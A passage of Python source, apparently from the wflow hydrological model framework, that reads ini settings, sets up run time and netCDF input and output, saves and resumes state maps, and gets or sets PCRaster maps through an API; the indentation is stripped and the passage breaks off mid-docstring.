if modelnamefromobject != self.modelname:
self.logger.warning(
"Ini file made for "
+ self.modelname
+ " but found "
+ modelnamefromobject
+ " in code."
)
self.runlengthdetermination = configget(
self._userModel().config, "run", "runlengthdetermination", "steps"
)
self.DT.update(
timestepsecs=int(
configget(self._userModel().config, "run", "timestepsecs", "86400")
),
mode=self.runlengthdetermination,
runTimeSteps=self.DT.runTimeSteps,
)
self._update_time_from_DT()
if doSetupFramework:
self.setupFramework()
def _initAPIVars(self):
"""
Sets vars in the API that are forcing variables to the model
"""
apivars = self.wf_supplyVariableNamesAndRoles()
for var in apivars:
if not hasattr(self._userModel(), var[0]):
setattr(self._userModel(), var[0], self.TheClone)
def setuptimeInfo(self):
"""
:return:
"""
from dateutil import parser
st = configget(self._userModel().config, "run", "starttime", "None")
# self.skipfirsttimestep = int(configget(self._userModel().config, 'run', 'skipfirst', "0"))
# Assume that we have set this via BMI
if self.DT.setByBMI:
self.logger.info(
"Not reading time from ini file, assuming it is set by BMI or otherwise (calls = "
+ str(self.DT.callstopupdate)
+ ")"
)
else:
if st == "None": # try from the runinfo file
rinfo_str = configget(
self._userModel().config, "run", "runinfo", "None"
)
rinfo = os.path.join(self._userModel().Dir, rinfo_str)
self.DT.update(
timestepsecs=int(
configget(
self._userModel().config, "run", "timestepsecs", "86400"
)
),
mode=self.runlengthdetermination,
runTimeSteps=self.DT.runTimeSteps,
)
self._update_time_from_DT()
if rinfo_str != "None":
self.DT.update(
datetimestart=wflow_adapt.getStartTimefromRuninfo(rinfo),
mode=self.runlengthdetermination,
)
self.DT.update(
datetimeend=wflow_adapt.getEndTimefromRuninfo(rinfo),
mode=self.runlengthdetermination,
)
self._update_time_from_DT()
# add one step to start time if it is the same s the state time
# if self.skipfirsttimestep:
# self.logger.debug("Skipping first timestep...")
# self.DT.skiptime()
self._userModel().currentdatetime = self.DT.currentDateTime
self.DT.update(
timestepsecs=int(
configget(
self._userModel().config, "run", "timestepsecs", "86400"
)
),
mode=self.runlengthdetermination,
)
self.DT.update(
currentTimeStep=self.DT.currentTimeStep,
mode=self.runlengthdetermination,
)
self._update_time_from_DT()
else:
self.DT.update(
datetimestart=parser.parse("1990-01-01 00:00:00 GMT"),
mode=self.runlengthdetermination,
)
self.logger.info(
"Not enough information in the [run] section. Need start and end time or a runinfo.xml file.... Reverting to default date/time"
)
else:
self.DT.update(
datetimestart=parser.parse(st), mode=self.runlengthdetermination
)
self.DT.update(
currentTimeStep=self.DT.currentTimeStep,
mode=self.runlengthdetermination,
)
# if self.skipfirsttimestep:
# self.logger.debug("Skipping first timestep...")
# self.DT.skiptime()
self._userModel().currentdatetime = self.DT.currentDateTime
ed = configget(self._userModel().config, "run", "endtime", "None")
if ed != "None":
self.DT.update(
datetimeend=parser.parse(ed), mode=self.runlengthdetermination
)
self.DT.update(
timestepsecs=int(
configget(
self._userModel().config, "run", "timestepsecs", "86400"
)
),
mode=self.runlengthdetermination,
)
self.DT.update(
currentTimeStep=self.DT.currentTimeStep,
mode=self.runlengthdetermination,
)
else:
self.logger.error(
"No end time given with start time: [run] endtime = " + ed
)
sys.exit(1)
self._update_time_from_DT()
def setupFramework(self):
"""
Second step, after setting the log file and reading the ini file get data from config, setup
IO etc
:return:
"""
self._initAPIVars()
self.framework_setup = True
caseName = self._userModel().caseName
runId = self._userModel().runId
self.outputFormat = int(
configget(self._userModel().config, "framework", "outputformat", "1")
)
self.APIDebug = int(
configget(
self._userModel().config, "framework", "debug", str(self.APIDebug)
)
)
self.ncfile = configget(
self._userModel().config, "framework", "netcdfinput", "None"
)
self.ncinfilestates = configget(
self._userModel().config, "framework", "netcdfstatesinput", "None"
)
self.ncoutfile = configget(
self._userModel().config, "framework", "netcdfoutput", "None"
)
self.ncoutfilestatic = configget(
self._userModel().config, "framework", "netcdfstaticoutput", "None"
)
self.ncoutfilestates = configget(
self._userModel().config, "framework", "netcdfstatesoutput", "None"
)
self.ncfilestatic = configget(
self._userModel().config, "framework", "netcdfstaticinput", "None"
)
self.EPSG = configget(
self._userModel().config, "framework", "EPSG", "EPSG:4326"
)
self.ncfileformat = configget(
self._userModel().config, "framework", "netcdf_format", "NETCDF4"
)
self.ncfilecompression = configget(
self._userModel().config, "framework", "netcdf_zlib", "True"
)
self.ncfiledigits = configget(
self._userModel().config,
"framework",
"netcdf_least_significant_digit",
"None",
)
if self.ncfiledigits == "None":
self.ncfiledigits = None
else:
self.ncfiledigits = int(self.ncfiledigits)
if self.ncfilecompression == "True":
self.ncfilecompression = True
else:
self.ncfilecompression = False
# Set the re-init hint for the local model
self.reinit = int(
configget(self._userModel().config, "run", "reinit", str(self.reinit))
)
self._userModel().reinit = self.reinit
# Now finally set the start end time. First check if set in ini otherwise check if the ini defines
# a runinfo file
self.setuptimeInfo()
# Setup all the netCDF files that may be used for input/output
if self.ncfile != "None":
varlst = []
if hasattr(self._userModel(), "parameters"):
for ms in self._userModel().parameters():
if ms.type == "timeseries":
varlst.append(os.path.basename(ms.stack))
mstacks = configsection(self._userModel().config, "inputmapstacks")
for ms in mstacks:
varlst.append(
os.path.basename(
configget(
self._userModel().config, "inputmapstacks", ms, "None"
)
)
)
self.logger.debug(
"Found following input variables to get from netcdf file: "
+ str(varlst)
)
self.NcInput = netcdfinput(
os.path.join(caseName, self.ncfile), self.logger, varlst
)
# Meta info for netcdf files
meta = {}
meta["caseName"] = caseName
meta["runId"] = runId
meta["wflow_version"] = __version__
# meta['wflow_release'] = __release__
# meta['wflow_build'] = __build__
meta["wflow_ini"] = self._userModel().configfile
if hasattr(sys, "frozen"):
meta["wflow_exe"] = "True"
else:
meta["wflow_exe"] = "False"
try:
metafrom_config = dict(self._userModel().config.items("netcdfmetadata"))
except:
metafrom_config = {}
meta.update(metafrom_config)
if self.ncinfilestates != "None":
smaps = self._userModel().stateVariables()
maps = [s + ".map" for s in smaps]
self.logger.debug(
"Found following input states to get from netcdf file: " + str(maps)
)
self.NcInputStates = netcdfinputstates(
os.path.join(caseName, self.ncinfilestates), self.logger, maps
)
if self.ncfilestatic != "None":
self.NcInputStatic = netcdfinputstatic(
os.path.join(caseName, self.ncfilestatic), self.logger
)
if self.ncoutfile != "None": # Ncoutput
buffer = int(
configget(
self._userModel().config, "framework", "netcdfwritebuffer", "50"
)
)
self.NcOutput = netcdfoutput(
os.path.join(caseName, runId, self.ncoutfile),
self.logger,
self.DT.outPutStartTime,
self.DT.runTimeSteps,
maxbuf=buffer,
metadata=meta,
EPSG=self.EPSG,
timestepsecs=self.DT.timeStepSecs,
Format=self.ncfileformat,
zlib=self.ncfilecompression,
least_significant_digit=self.ncfiledigits,
)
if self.ncoutfilestatic != "None": # Ncoutput
self.NcOutputStatic = netcdfoutputstatic(
os.path.join(caseName, runId, self.ncoutfilestatic),
self.logger,
self.DT.runEndTime,
1,
timestepsecs=self.DT.timeStepSecs,
maxbuf=1,
metadata=meta,
EPSG=self.EPSG,
Format=self.ncfileformat,
zlib=self.ncfilecompression,
least_significant_digit=self.ncfiledigits,
)
if self.ncoutfilestates != "None": # Ncoutput
self.NcOutputState = netcdfoutputstatic(
os.path.join(caseName, runId, self.ncoutfilestates),
self.logger,
self.DT.runEndTime,
1,
timestepsecs=self.DT.timeStepSecs,
maxbuf=1,
metadata=meta,
EPSG=self.EPSG,
Format=self.ncfileformat,
zlib=self.ncfilecompression,
least_significant_digit=self.ncfiledigits,
)
# Add the on-line statistics
self.onlinestat = wf_online_stats()
rollingvars = configsection(self._userModel().config, "rollingmean")
for thisvar in rollingvars:
try:
thisvarnoself = thisvar.split("self.")[1]
except:
logging.error("Entry in ini invalid: " + thisvar)
raise ValueError
pts = int(self._userModel().config.get("rollingmean", thisvar))
self.onlinestat.addstat(thisvarnoself, points=pts)
# and set the var names
for key in self.onlinestat.statvarname:
setattr(
self._userModel(), self.onlinestat.statvarname[key], self.TheClone * 0.0
)
# Fill the summary (stat) list from the ini file
self.statslst = []
_type = wf_sumavg(None)
for sttype in _type.availtypes:
_maps = configsection(self._userModel().config, "summary_" + sttype)
for thismap in _maps:
thismapname = os.path.join(
caseName,
runId,
"outsum",
self._userModel().config.get("summary_" + sttype, thismap),
)
try:
thismap = thismap.split("self.")[1]
except:
logging.error("Entry in ini invalid: " + thismap)
raise ValueError
self.statslst.append(
wf_sumavg(thismap, mode=sttype, filename=thismapname)
)
# Get model parameters from model object
if hasattr(self._userModel(), "parameters"):
self.modelparameters = self._userModel().parameters()
else:
self.modelparameters = []
# Read extra model parameters from ini file
modpars = configsection(self._userModel().config, "modelparameters")
for par in modpars:
aline = self._userModel().config.get("modelparameters", par)
vals = aline.split(",")
if len(vals) >= 4:
# check if par already present
present = par in [xxx[0] for xxx in self.modelparameters]
if present:
pos = [xxx[0] for xxx in self.modelparameters].index(par)
# Check if the existing definition is static, in that case append, otherwise overwrite
if "static" in self.modelparameters[pos].type:
self._userModel().logger.debug(
"Creating extra parameter specification for par: "
+ par
+ " ("
+ str(vals)
+ ")"
)
self.modelparameters.append(
self.ParamType(
name=par,
stack=vals[0],
type=vals[1],
default=float(vals[2]),
),
verbose=vals[3],
lookupmaps=vals[4:],
)
else:
self._userModel().logger.debug(
"Updating existing parameter specification for par: "
+ par
+ " ("
+ str(vals)
+ ")"
)
self.modelparameters[pos] = self.ParamType(
name=par,
stack=vals[0],
type=vals[1],
default=float(vals[2]),
verbose=vals[3],
lookupmaps=vals[4:],
)
else:
self._userModel().logger.debug(
"Creating parameter specification for par: "
+ par
+ " ("
+ str(vals)
+ ")"
)
self.modelparameters.append(
self.ParamType(
name=par,
stack=vals[0],
type=vals[1],
default=float(vals[2]),
verbose=vals[3],
lookupmaps=vals[4:],
)
)
else:
logging.error("Parameter line in ini not valid: " + aline)
raise ValueError
varchanges = configsection(self._userModel().config, "variable_change_once")
for chvar in varchanges:
a = chvar.replace("self", "self._userModel()")
self.modelparameters_changes_once[a] = (
self._userModel()
.config.get("variable_change_once", chvar)
.replace("self", "self._userModel()")
)
varchanges = configsection(self._userModel().config, "variable_change_timestep")
for chvar in varchanges:
a = chvar.replace("self", "self._userModel()")
self.modelparameters_changes_timestep[a] = (
self._userModel()
.config.get("variable_change_timestep", chvar)
.replace("self", "self._userModel()")
)
# Now gather all the csv/tss/txt etc timeseries output objects
# Print .ini defined outputmaps per timestep
checktss = configsection(self._userModel().config, "outputtss")
if len(checktss) > 0:
self.logger.warning(
"Found a outputtss section. This is NOT used anymore in this version. Please use outputtss_0 .. n"
)
self.oscv = {}
self.samplenamecsv = {}
self.varnamecsv = {}
for tsformat in ["csv", "tss"]:
secnr = 0
toprint = [None]
while len(toprint) > 0:
thissection = "output" + tsformat + "_" + str(secnr)
toprint = configsection(self._userModel().config, thissection)
secnr = secnr + 1
samplemapname = os.path.join(
caseName,
configget(
self._userModel().config, thissection, "samplemap", "None"
),
)
areafunction = configget(
self._userModel().config, thissection, "function", "average"
)
timeformat = configget(
self._userModel().config, thissection, "timeformat", "steps"
)
if "None" not in samplemapname:
try:
self.samplemap = self.wf_readmap(samplemapname, 0.0, fail=True)
idd = tsformat + ":" + samplemapname + ":" + areafunction
self.oscv[idd] = wf_OutputTimeSeriesArea(
self.samplemap,
oformat=tsformat,
areafunction=areafunction,
tformat=timeformat,
)
self.logger.info(
"Adding "
+ tsformat
+ " output at "
+ samplemapname
+ " function: "
+ areafunction
)
except:
self.logger.warning(
"Could not read sample id-map for timeseries: "
+ samplemapname
)
self.logger.warning(sys.exc_info())
for a in toprint:
if (
"samplemap" not in a
and "function" not in a
and "timeformat" not in a
):
b = a.replace("self", "self._userModel()")
fn = os.path.join(
caseName,
runId,
self._userModel().config.get(thissection, a),
)
self.samplenamecsv[fn] = idd
self.varnamecsv[fn] = b
def wf_suspend(self, directory):
"""
Suspend the state variables to disk as .map files
Also saves the summary maps
"""
self._incrementIndentLevel()
self._traceIn("suspend")
allvars = self._userModel().stateVariables()
for var in allvars:
try:
fname = os.path.join(directory, var).replace("\\", "/") + ".map"
# savevar = getattr(self._userModel(), var)
savevar = reduce(getattr, var.split("."), self._userModel())
try: # Check if we have a list of maps
b = len(savevar)
a = 0
for z in savevar:
fname = (
os.path.join(directory, var + "_" + str(a)).replace(
"\\", "/"
)
+ ".map"
)
self.reportState(
pcr.cover(z), fname, style=1, gzipit=False, longname=fname
)
a = a + 1
except:
# thevar = getattr(self._userModel(), var)
thevar = reduce(getattr, var.split("."), self._userModel())
self.reportState(
thevar, fname, style=1, gzipit=False, longname=fname
)
except:
self.logger.warning("Problem saving state variable: " + var)
# self.logger.warning(execstr)
self.logger.warning(sys.exc_info())
# Save the summary maps
self.wf_savesummarymaps()
self._traceOut("suspend")
self._decrementIndentLevel()
def wf_saveTimeSeries(self):
"""
Print .ini defined output csv/tss timeseries per timestep
"""
for a in self.samplenamecsv:
found = 1
try:
if "+" in self.varnamecsv[a]:
a_ = self.varnamecsv[a].split("+")
tmpvar = pcr.cover(0.0)
for i in np.arange(0, len(a_)):
tmpvar = tmpvar + reduce(
getattr,
a_[i].strip().replace("self._userModel().", "").split("."),
self._userModel(),
)
else:
# this is added for flextopo -- because list of variables for different classes
if '[' in self.varnamecsv[a].replace("self._userModel().", ""):
listnr = self.varnamecsv[a].replace("self._userModel().", "").split('[')[-1].split(']')[0]
varname = self.varnamecsv[a].replace("self._userModel().", "").split('[')[0]
tmpvar = getattr(self._userModel(),varname)[int(listnr)]
else:
tmpvar = reduce(
getattr,
self.varnamecsv[a].replace("self._userModel().", "").split("."),
self._userModel(),
)
except:
found = 0
self.logger.fatal(
"Cannot find: " + self.varnamecsv[a] + " variable not in model."
)
sys.exit(1)
self.oscv[self.samplenamecsv[a]].writestep(
tmpvar,
a,
timestep=self.DT.currentTimeStep - 1,
dtobj=self.DT.currentDateTime,
)
def wf_savesummarymaps(self):
"""
Saves the maps defined in the summary section to disk
[summary] # Single values or end values
[summary_sum] # accumulative maps over the model run
[summary_avg] # average of maps over the model run
[summary_max] # max of maps over the model run
[summary_min] # min of maps over the model run
"""
self._userModel().logger.info("Saving summary maps to disk...")
toprint = configsection(self._userModel().config, "summary")
for a in toprint:
b = a.replace("self.", "")
try:
#below if statement for topoflex lists code
if '[' in str(b):
listnr = str(b).split('[')[-1].split(']')[0]
varname = str(b).split('[')[0]
pcrmap = getattr(self._userModel(),varname)[int(listnr)]
else:
pcrmap = getattr(self._userModel(), b)
self.reportStatic(
pcrmap,
os.path.join(
self._userModel().Dir,
self._userModel().runId,
"outsum",
self._userModel().config.get("summary", a),
),
style=1,
)
except:
self._userModel().logger.warning(
"Could not find or save the configured summary map:" + a
)
# Check of the usermodel has a list of summary maps defined and save those
if hasattr(self._userModel(), "default_summarymaps"):
for a in self._userModel().default_summarymaps():
b = a.replace("self.", "")
if hasattr(self._userModel(), b):
pcrmap = getattr(self._userModel(), b)
# pcr.report( pcrmap , os.path.join(self._userModel().Dir, self._userModel().runId, "outsum", b + ".map" ))
self.reportStatic(
pcrmap,
os.path.join(
self._userModel().Dir,
self._userModel().runId,
"outsum",
b + ".map",
),
style=1,
)
# These are the ones in the _sum _average etc sections
for a in range(0, len(self.statslst)):
self.statslst[a].finalise()
if hasattr(self.statslst[a].result, "isSpatial"):
data = self.statslst[a].result
fname = self.statslst[a].filename
if hasattr(data, "isSpatial"):
# report (data,fname)
self.reportStatic(data, fname, style=1)
def wf_savedynMaps(self):
"""
Save the maps defined in the ini file for the dynamic section
.. todo::
Save maps to be used in memory at startup and do not call the ini file each time
"""
# Print .ini defined outputmaps per timestep
toprint = configsection(self._userModel().config, "outputmaps")
self.logger.info("saving maps")
for a in toprint:
report = False
# possible to add variables
if "+" in a:
a_ = a.split("+")
thevar = pcr.cover(0.0)
for i in np.arange(0, len(a_)):
# check for nested objects
if len(a_[i].replace("self.", "").split(".")) > 1:
if hasattr(
(
self._userModel(),
a_[i].replace("self.", "").split(".")[0],
)
and reduce(
getattr,
a_[i].replace("self.", "").split("."),
self._userModel(),
)
is not None
):
thevar = thevar + reduce(
getattr,
a_[i].replace("self.", "").split("."),
self._userModel(),
)
report = True
elif hasattr(self._userModel(), a_[i].strip().replace("self.", "")):
thevar = thevar + getattr(
self._userModel(), a_[i].strip().replace("self.", "")
)
report = True
else:
report = False
break
else:
# check for nested objects
if len(a.replace("self.", "").split(".")) > 1:
if (
hasattr(self._userModel(), a.replace("self.", "").split(".")[0])
and reduce(
getattr,
a.replace("self.", "").split("."),
self._userModel(),
)
is not None
):
thevar = reduce(
getattr,
a.replace("self.", "").split("."),
self._userModel(),
)
report = True
#add lines below for topoflex
elif '[' in str(a.replace("self.", "")):
listnr = str(a.replace("self.", "")).split('[')[-1].split(']')[0]
varname = str(a.replace("self.", "")).split('[')[0]
thevar = getattr(self._userModel(),varname)[int(listnr)]
report = True
elif hasattr(self._userModel(), a.replace("self.", "")):
thevar = getattr(self._userModel(), a.replace("self.", ""))
report = True
if report == True:
if type(thevar) is list:
a = self._userModel().config.get("outputmaps", a)
for i in np.arange(0, len(thevar)):
thename = a + "_" + str(i) + "_"
self._reportNew(
thevar[i],
os.path.join(
self._userModel().Dir,
self._userModel().runId,
"outmaps",
thename,
),
longname=thename,
)
else:
self._reportNew(
thevar,
os.path.join(
self._userModel().Dir,
self._userModel().runId,
"outmaps",
self._userModel().config.get("outputmaps", a),
),
longname=a,
)
else:
self.logger.warning("outputmap " + a + " not found in usermodel")
def wf_resume(self, directory):
"""
Resumes the state variables from disk as .map files (or arrays of maps files using
a _? postfix)
"""
self._incrementIndentLevel()
self._traceIn("resume")
allvars = self._userModel().stateVariables()
for var in allvars:
# First try to read a stack of state files
stop = 0
nr = 0
while stop == 0:
name = os.path.join(directory, var + "_" + str(nr) + ".map").replace(
"\\", "/"
)
if os.path.exists(name):
tvar = self.wf_readmap(
name,
0.0,
ncfilesource=self.ncinfilestates,
fail=True,
silent=True,
)
if nr == 0:
setattr(self._userModel(), var, [])
getattr(self._userModel(), var).append(tvar)
nr = nr + 1
else:
if nr > 0:
self.logger.info(
"state variable "
+ str(var)
+ " contains "
+ str(nr)
+ " state files (stack)"
)
stop = 1
if nr == 0:
try:
mpath = os.path.join(directory, var + ".map").replace("\\", "/")
tvar = self.wf_readmap(mpath, 0.0, ncfilesource=self.ncinfilestates)
# check for nested objects
if "." in var:
attrs = var.split(".")
c = getattr(self._userModel(), attrs[0])
setattr(c, attrs[1], tvar)
else:
setattr(self._userModel(), var, tvar)
except:
self.logger.error(
"problem while reading state variable from disk: "
+ mpath
+ " Suggest to use the -I option to restart"
)
sys.exit(1)
self._traceOut("resume")
self._decrementIndentLevel()
def wf_QuickSuspend(self):
"""
Save the state variable of the current timestep in memory
it uses the wf_supplyVariableNamesAndRoles() function to find them.
The variables are inserted into the model object
This function is normally called as part of the run. Normally there is
no need to call it directly.
"""
allvars = self._userModel().stateVariables()
for var in allvars:
try:
setattr(
self._userModel(),
var + "_laststep",
reduce(getattr, var.split("."), self._userModel()),
)
except:
self.logger.warning("Problem saving state variable: " + var)
def wf_QuickResume(self):
"""
Resumes the state variable of the previous timestep in memory
it uses the wf_supplyVariableNamesAndRoles() function to find them.
The variables are inserted into the model object
"""
allvars = self._userModel().stateVariables()
for var in allvars:
setattr(
self._userModel(), var, getattr(self._userModel(), var + "_laststep")
)
ts = self._userModel().currentTimeStep()
self._userModel()._setCurrentTimeStep(ts)
self.DT.update(currentTimeStep=ts)
self._userModel().currentdatetime = self.DT.currentDateTime
self.logger.debug(
"Going one timestep back, redoing: "
+ str(ts)
+ " "
+ str(self.DT.currentDateTime)
)
def iniFileSetUp(self, caseName, runId, configfile):
"""
Reads .ini file and returns a config object.
Input:
- caseName - dir with case
- runId - run dir within case
- configfile - name of the configfile (.ini type)
Output:
- python config object
"""
config = configparser.ConfigParser()
config.optionxform = str
if os.path.exists(os.path.join(caseName, configfile)):
config.read(os.path.join(caseName, configfile))
else:
self.logger.error(
"Cannot open ini file: " + os.path.join(caseName, configfile)
)
sys.exit(1)
return config
def wf_setValuesAsNumpy(self, mapname, values):
"""
set a map with values from a numpy array. Current settings for
dimensions are assumed. if the name of the maps contains the string "LDD" or "ldd"
the maps is assumed to be an LDD maps and an lddrepair call is made,
assume -999 as missing value
also checks if map contains int at end, then map is part of List object:
map_0 is part of self.map[0]
Input:
- mapname - string with name of map
- values - numpy array
:returns: 1 if the map was present, 0 if a new map was created
"""
arpcr = pcr.numpy2pcr(pcr.Scalar, np.flipud(values).copy(), -999)
self.setviaAPI[mapname] = 1
if hasattr(self._userModel(), mapname):
if "LDD" in mapname.upper():
setattr(self._userModel(), mapname, pcr.lddrepair(pcr.ldd(arpcr)))
else:
if mapname.split('_')[-1].isdigit():
getattr(self._userModel(), mapname.split('_')[0])[int(mapname.split('_')[-1])] = arpcr
else:
setattr(self._userModel(), mapname, arpcr)
return 1
else:
self.logger.debug(
mapname + " is not defined in the usermodel: setting anyway"
)
if mapname.split('_')[-1].isdigit():
getattr(self._userModel(), mapname.split('_')[0])[int(mapname.split('_')[-1])] = arpcr
else:
setattr(self._userModel(), mapname, arpcr)
return 0
def wf_setValuesAsPcrMap(self, mapname, pcrmap):
"""
set a map with values from a pcrmap. Current settings for
dimensions are assumed.
also checks if map contains int at end, then map is part of List object:
map_0 is part of self.map[0]
Input:
- mapname - string with name of map
- pcrmap - pcraster map
:returns: 1 if the map was present, 0 if a new map was created
"""
arpcr = pcrmap
self.setviaAPI[mapname] = 1
if hasattr(self._userModel(), mapname):
if mapname.split('_')[-1].isdigit():
getattr(self._userModel(), mapname.split('_')[0])[int(mapname.split('_')[-1])] = arpcr
else:
setattr(self._userModel(), mapname, arpcr)
return 1
else:
self.logger.debug(
mapname + " is not defined in the usermodel: setting anyway"
)
if mapname.split('_')[-1].isdigit():
getattr(self._userModel(), mapname.split('_')[0])[int(mapname.split('_')[-1])] = arpcr
else:
setattr(self._userModel(), mapname, arpcr)
return 0
def wf_setValues(self, mapname, values):
"""
set a map with values from a python list or a single scalar
value. In case a single value is specified the value will be distributed
uniformly over the map. Current settings for
dimensions are assumed.
also checks if map contains int at end, then map is part of List object:
map_0 is part of self.map[0]
Input:
- mapname - string with name of map
- values - single list of value of length rows * cols or a single
scalar
:returns: 1 if the map was present, 0 if a new map was created
"""
self.setviaAPI[mapname] = 1
if isinstance(values, list):
ar = np.array(values)
ar.reshape(getrows(), getcols())
arpcr = pcr.numpy2pcr(pcr.Scalar, ar.reshape(getrows(), getcols()), -999)
else:
self.logger.debug("Setting single value: " + str(values))
arpcr = pcr.cover(pcr.scalar(values))
if hasattr(self._userModel(), mapname):
if mapname.split('_')[-1].isdigit():
getattr(self._userModel(), mapname.split('_')[0])[int(mapname.split('_')[-1])] = arpcr
else:
setattr(self._userModel(), mapname, arpcr)
return 1
else:
self.logger.debug(
mapname + " is not defined in the usermodel: setting anyway"
)
if mapname.split('_')[-1].isdigit():
getattr(self._userModel(), mapname.split('_')[0])[int(mapname.split('_')[-1])] = arpcr
else:
setattr(self._userModel(), mapname, arpcr)
return 0
def wf_setValueRowCol(self, mapname, value, row, col):
"""
set single value in a map on row, col (0 based). All other values in the
map remain the same. Numbering starts at the upper left corner.
also checks if map contains int at end, then map is part of List object:
map_0 is part of self.map[0]
Input:
- mapname - string with name of map
- row - row to set the value in
- col - column to set the value in
- values - single scalar
:returns: 1 if the map was present, 0 if nothing was done
"""
self.setviaAPI[mapname] = 1
if hasattr(self._userModel(), mapname):
if mapname.split('_')[-1].isdigit():
ar = pcr.pcr2numpy(getattr(self._userModel(), mapname.split('_')[0])[int(mapname.split('_')[-1])])
else:
ar = pcr.pcr2numpy(getattr(self._userModel(), mapname), -999)
ar[row, col] = value
arpcr = pcr.numpy2pcr(pcr.Scalar, ar.copy(), -999)
if mapname.split('_')[-1].isdigit():
getattr(self._userModel(), mapname.split('_')[0])[int(mapname.split('_')[-1])] = arpcr
else:
setattr(self._userModel(), mapname, arpcr)
return 1
else:
self.logger.debug(
mapname + " is not defined in the usermodel. Doing nothing"
)
return 0
def wf_setValue(self, mapname, value, xcor, ycor):
"""
set single value in a map on xcor, ycor (0 based). All other values in the
map remain the same.
Also checks if map contains int at end, then map is part of List object:
map_0 is part of self.map[0]
Input:
- mapname - string with name of map
- xcor - xcor to set the value in
- ycor - ycor to set the value in
- value - single scalar
:returns: 1 if the map was present, 0 if nothing was done
"""
self.setviaAPI[mapname] = 1
if hasattr(self._userModel(), mapname):
if mapname.split('_')[-1].isdigit():
pcrmap = getattr(self._userModel(), mapname.split('_')[0])[int(mapname.split('_')[-1])]
else:
pcrmap = getattr(self._userModel(), mapname)
ar = pcr.pcr2numpy(pcr.scalar(pcrmap), -999)
row, col = getRowColPoint(pcrmap, xcor, ycor)
ar[row, col] = value
save("tt.np", ar)
pcrmap = pcr.numpy2pcr(pcr.Scalar, ar.copy(), -999)
pcr.report(pcrmap, "zz.map")
if mapname.split('_')[-1].isdigit():
getattr(self._userModel(), mapname.split('_')[0])[int(mapname.split('_')[-1])] = pcrmap
else:
setattr(self._userModel(), mapname, pcrmap)
return 1
else:
self.logger.debug(mapname + " is not defined in the usermodel")
return 0
def wf_setValueLdd(self, mapname, value, xcor, ycor):
"""
set single value in an ldd on xcor, ycor (0 based). All other values in the
map remain the same. Calls lddrepair to ensure the ldd is sound
Input:
- mapname of tipy ldd - string with name of map
- xcor - xcor to set the value in
- ycor - ycor to set the value in
- values - single scalar (see pcraster ldddescription for legal values)
e.g. use 5 for setting a pit
:returns: 1 if the map was present, 0 if nothing was done
"""
self.setviaAPI[mapname] = 1
if hasattr(self._userModel(), mapname):
pcrmap = getattr(self._userModel(), mapname)
ar = pcr.pcr2numpy(pcrmap, -999)
row, col = getRowColPoint(pcrmap, xcor, ycor)
ar[row, col] = value
arpcr = pcr.numpy2pcr(pcr.Scalar, ar.copy(), -999)
setattr(self._userModel(), mapname, pcr.lddrepair(pcr.ldd(arpcr)))
return 1
else:
self.logger.debug(
mapname + " is not defined in the usermodel, doing nothing"
)
return 0
def wf_multParameterValues(self, mapname, value):
"""
multiply a parameter map with a single scalar
value. Current settings for dimensions are assumed.
This method must be called *after* the runinitial() method
Input:
- mapname - string with name of map
- value - single scalar
:returns: 1 if the map was present, 0 if nothing was done
"""
arpcr = pcr.cover(value)
self.setviaAPI[mapname] = 1
if hasattr(self._userModel(), mapname):
setattr(
self._userModel(), mapname, arpcr * getattr(self._userModel(), mapname)
)
return 1
else:
self.logger.debug(
mapname + " is not defined in the usermodel, doing nothing"
)
return 0
def wf_multParameterValuesArea(self, mapname, value, areacode, areamapname):
"""
multiply a parameter map with a single scalar
value for area with id area only. Current settings for dimensions are assumed.
This method must be called *after* the runinitial() method
Input:
- mapname - string with name of map
- value - single scalar
- areacode - id of the area in the areamap
- areamapname - name of the areamap
:returns: 1 if the map was present, 0 if nothing was done
"""
arpcr = pcr.cover(value)
self.setviaAPI[mapname] = 1
if hasattr(self._userModel(), mapname):
setattr(
self._userModel(),
mapname,
pcr.ifthenelse(
getattr(self._userModel(), areamapname) == str(areacode),
arpcr * getattr(self._userModel(), areamapname),
getattr(self._userModel(), areamapname),
),
)
return 1
else:
self.logger.debug(
mapname + " is not defined in the usermodel, doing nothing"
)
return 0
def wf_setParameterValues(self, mapname, values):
"""
set a parameter map with values from a python list or a single scalar
value. In case a single value is specified the value will be distributed
uniformly over the map. Current settings for dimensions are assumed.
This method must be called _after_ the runinitial() method
Input:
- mapname - string with name of map
- values - single list of value of length rows * cols or a single
scalar
:returns: 1 if the map was present, 0 if nothing was done
"""
self.setviaAPI[mapname] = 1
if isinstance(values, list):
ar = np.array(values)
ar.reshape(getrows(), getcols())
arpcr = pcr.numpy2pcr(pcr.Scalar, ar.reshape(getrows(), getcols()), -999)
else:
arpcr = pcr.cover(values)
if hasattr(self._userModel(), mapname):
setattr(self._userModel(), mapname, arpcr)
return 1
else:
self.logger.debug(
mapname + " is not defined in the usermodel, doing nothing"
)
return 0
def wf_supplyParameterAsList(self, mapname):
"""
Returns a python list for the specified parameter map and the current
timestep. If the maps is not dynamic the current status of the map is
returned.
Input:
- mapname (string)
Output:
- list
"""
if hasattr(self._userModel(), mapname):
retval = pcr.pcr2numpy(getattr(self._userModel(), mapname), -999)
return retval.flatten().tolist()
else:
self.logger.debug(
mapname + " is not defined in the usermodel, returning empty list"
)
return []
def wf_supplyMapAsList(self, mapname):
"""
Returns a python list for the specified map and the current
timestep. If the maps is not dynamic the current status of the map is
returned which may be undefined for maps that are filled with data
at the end of a run
Input:
- mapname (string)
Output:
- list
"""
if hasattr(self._userModel(), mapname):
retval = pcr.pcr2numpy(getattr(self._userModel(), mapname), -999)
if self.APIDebug:
self.logger.debug("wf_supplyMapAsList returning: " + mapname)
return retval.flatten().tolist()
else:
self.logger.warning(
mapname + " is not defined in the usermodel, returning empty list"
)
return []
def wf_supplyMapAsNumpy(self, mapname):
"""
Returns a numpy array (matrix) for the specified map and the current
timestep. If the maps is not dynamic the current status of the map is
returns which may be undefined for maps that are filled with data
at the end of a run.
Also checks if map contains int at end, then map is part of List object:
map_0 is part of self.map[0]
Missing value is -999
Input:
- mapname (string)
Output:
- numpy array
"""
if hasattr(self._userModel(), mapname):
if mapname.split('_')[-1].isdigit():
pcrmap = getattr(self._userModel(), mapname.split('_')[0])[int(mapname.split('_')[-1])]
else:
pcrmap = getattr(self._userModel(), mapname)
if isinstance(pcrmap, pcraster._pcraster.Field):
tt = pcr.pcr2numpy(pcrmap, -999.0)
retval = np.flipud(tt).copy()
else:
if type(pcrmap) == np.ndarray:
retval = pcrmap
else:
retval = np.array(pcrmap)
if self.APIDebug:
self.logger.debug("wf_supplyMapAsNumpy returning: " + mapname)
else:
self.logger.warning(
mapname + " is not defined in the usermodel, returning empty array"
)
return []
return retval
def wf_supplyMapXAsNumpy(self):
"""
